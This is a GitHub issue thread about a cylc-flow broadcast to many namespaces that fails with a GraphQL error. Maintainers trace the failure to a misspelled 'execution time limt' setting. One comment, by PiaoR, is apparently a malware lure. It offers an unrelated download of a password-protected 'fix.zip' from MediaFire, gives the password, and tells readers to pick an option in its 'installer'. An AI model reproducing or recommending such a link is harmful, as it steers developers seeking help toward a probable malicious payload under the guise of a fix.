### ISSUE TITLE
Broadcast: GraphQL timeout error for many namespaces

### ISSUE THREAD

**Issue by ColemanTom** [cylc/cylc-flow#6333]
### Description

I'm not sure if this is related to #6222, but, via the WUI, I did a broadcast to many namespaces and got this time out error from GraphQL. 

```
2024-08-28T06:00:29Z INFO - Command "broadcast" received from USERNAME.
    broadcast(cycle_points=['*'], mode=put_broadcast, namespaces=['task_000', 'task_012', 'task_024', 'task_048', 'task_060', 'task_072', 'task_084', 'task_096', 'task_108', 'task_120', 'task_132', 'task_144', 'task_156', 'task_168', 'task_180', 'task_192', 'task_204', 'task_216', 'task_228', 'task_240'], settings=[{'execution time limt': 'PT30M'}])
Traceback (most recent call last):
  File "miniconda3/cylc-8.3.3/lib/python3.11/site-packages/promise/promise.py", line 844, in handle_future_result
    resolve(future.result())
            ^^^^^^^^^^^^^^^
  File "miniconda3/cylc-8.3.3/lib/python3.11/site-packages/cylc/flow/network/graphql.py", line 433, in async_resolve
    return await next_(root, info, **args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "miniconda3/cylc-8.3.3/lib/python3.11/site-packages/promise/iterate_promise.py", line 10, in iterate_promise
    yield from promise.future  # type: ignore
    ^^^^^^^^^^^^^^^^^^^^^^^^^
graphql.error.located_error.GraphQLLocatedError: execution time limt
```

### Reproducible Example

Will see if I can provide a simple one, but none provided yet. Just broadcast to many tasks at once. I've not been able to replicate it from CLI.

### Expected Behaviour

No error, broadcasts get through. Maybe you need to split the broadcast up into chunks of N size?

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by oliver-sanders** [comment]
@ColemanTom, I haven't been able to replicate this one. Where did you observe this traceback, in the scheduler log or the Cylc UI Server log?

It's quite likely that this is related to #6334 given the `execution time limit` key. Might be worth trying to reproduce it with the fix for that issue if possible.

**Comment by ColemanTom** [comment]
Cylc log. I don't even know where the ui log is to look at that.

**Comment by oliver-sanders** [comment]
`~/.cylc/uiserver/log`

**Comment by ColemanTom** [comment]
It could simply be a slow network caused it. I was running things through the WUI for another user too if that adds any latency, it wasn't as myself. I'll see if I can do it again as myself and as a different user again later or next week.

**Comment by oliver-sanders** [comment]
Aah, I've just spotted what's going on here. It's a typo **limt** rather than "limit".

```
graphql.error.located_error.GraphQLLocatedError: execution time limt
```

It is erroring because the config broadcasted is invalid, however, the error isn't being caught and logged nicely.

Have opened an issue to cover this: https://github.com/cylc/cylc-flow/issues/6429
